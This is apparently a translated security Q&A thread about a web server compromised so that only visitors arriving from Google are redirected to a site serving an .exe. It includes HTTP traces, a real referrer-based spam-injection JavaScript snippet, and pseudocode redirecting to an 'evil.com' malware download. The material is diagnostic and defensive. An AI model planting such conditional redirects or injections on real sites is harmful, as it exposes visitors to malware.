Server compromesso che reindirizza solo le richieste di Google

5

Ho trovato qualcosa di molto sospetto. Quando ti connetti a www.pulseexpress.com seguendo un link di Google, il server ti reindirizza verso un sito molto dubbioso che ti invia subito un file .exe:

# host www.pulseexpress.com
www.pulseexpress.com has address 173.236.189.124

# netcat 173.236.189.124 80
GET / HTTP/1.1
Host: www.pulseexpress.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:10.0.2) Gecko/20100101
Firefox/10.0.2 Iceweasel/10.0.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en-gb;q=0.8,en;q=0.6,de-de;q=0.4,de;q=0.2
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Referer:
http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0CDEQFjAA&url=http%3A%2F%2Fwww.pulseexpress.com%2F&ei=JfhkT_SuGYf40gG85MW_CA&usg=AFQjCNGlomNN7JWxEG7DUzbJyqnVFYkj7w&sig2=i5xsJPgIs1sbD6gpDzJ7OQ

HTTP/1.1 302 Moved Temporarily
Date: Sat, 17 Mar 2012 20:53:40 GMT
Server: Apache
Location: http://www.fdvrerefrr.ezua.com/
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 20
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html

Tuttavia, se inserisci l'indirizzo direttamente nel tuo browser, il contenuto viene pubblicato normalmente:

# netcat 173.236.189.124 80
GET / HTTP/1.1
Host: www.pulseexpress.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:10.0.2) Gecko/20100101
Firefox/10.0.2 Iceweasel/10.0.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en-gb;q=0.8,en;q=0.6,de-de;q=0.4,de;q=0.2
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive

HTTP/1.1 200 OK
Date: Sat, 17 Mar 2012 20:53:51 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0,
pre-check=0
Pragma: no-cache
Set-Cookie: e7c55e1c7796b5e5c04e0c55afd862ea=e427sf2eh4t11jno5c4pvaal40;
path=/
Set-Cookie: virtuemart=e427sf2eh4t11jno5c4pvaal40
Set-Cookie: ja_purity_tpl=ja_purity; expires=Thu, 07-Mar-2013 20:53:53
GMT; path=/
Last-Modified: Sat, 17 Mar 2012 20:53:53 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 4428
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
[...]

Per me sembra che il server sia stato compromesso. Inoltre, l'attacco sembra essere stato non banale, in quanto la configurazione di Apache deve essere stata modificata in modo tale che solo alcune richieste vengano reindirizzate, probabilmente per rendere meno probabile che il proprietario si accorga del problema.

Le persone sono d'accordo con tale analisi?

Questa tecnica di reindirizzamento condizionale è qualcosa di nuovo e realizzato a mano o è una procedura di routine inclusa in suite di software di attacco standard?

    
posta Nikratio 17.03.2012 - 22:04
fonte

2 risposte

2

La risposta breve. Sì, questo tipo di reindirizzamento condizionale basato sul referente è di routine.

Dettagli. In genere ho visto questo implementato inserendo alcuni Javascript nella pagina per controllare document.referrer . Non l'avevo già visto implementato nella configurazione del server Apache, ma questa è una naturale evoluzione della pratica esistente, quindi non è troppo sorprendente per me.

Ulteriori informazioni. SANS ha un eccellente articolo sull'argomento e su come proteggersi. Un suggerimento è quello di impostare una ricerca su Google, limitata al tuo sito ( site:yoursite.com ) e elencando alcune parole chiave che potrebbero essere introdotte dagli aggressori, e vedere se rileva qualche cosa. Questo non avrebbe rilevato il particolare attacco che hai menzionato, ma sarebbe d'aiuto con gli attacchi correlati. Consulta l'articolo per un avviso Google suggerito che puoi utilizzare.

Segnalazione di siti dannosi. Per riferimento futuro, puoi segnalare siti Web dannosi / compromessi a Google e Microsoft tramite vari moduli web online , per proteggere altri utenti che potrebbero cercare di accedere a tali siti in futuro. Mi sono permesso di segnalare entrambi i siti a Google, ma potresti anche voler fare lo stesso e segnalarlo a Microsoft se utilizzi IE. Non riesco a scaricare il file .exe più a lungo, ma se hai salvato l'exe, puoi anche segnalarlo online a vari fornitori di antivirus .

Codice di exploit di esempio. Ad esempio, ecco uno snippet di esempio da un sito web compromesso (codice vero e proprio, non compilato):

<script type="text/javascript">
if(document.referrer.toUpperCase().indexOf("CIALIS") != -1)
{
    document.getElementById('hMenu').innerHTML = "<h1
    align=\"center\">Cialis 10mg</h1> [...] ";
}
</script>

Nel tuo caso, l'attacco sembra essere fatto compromettendo la configurazione o l'installazione di Apache piuttosto che inserendo Javascript nella pagina, ma ho pensato che potresti trovare comunque interessante.

    
risposta data 17.03.2012 - 23:06
fonte
1

Questa roba si verifica abbastanza spesso ed è facile da configurare.

If referer contains 'google':
redirect to 'evil.com/steal_all_your_private_stuff.exe'

Lo fanno in questo modo per nascondere il fatto che il server è stato compromesso.

Una prima prova per rilevare una backdoor di questo tipo sarebbe grep google -irn /var/www/

    
risposta data 17.03.2012 - 23:02
fonte

Leggi altre domande sui tag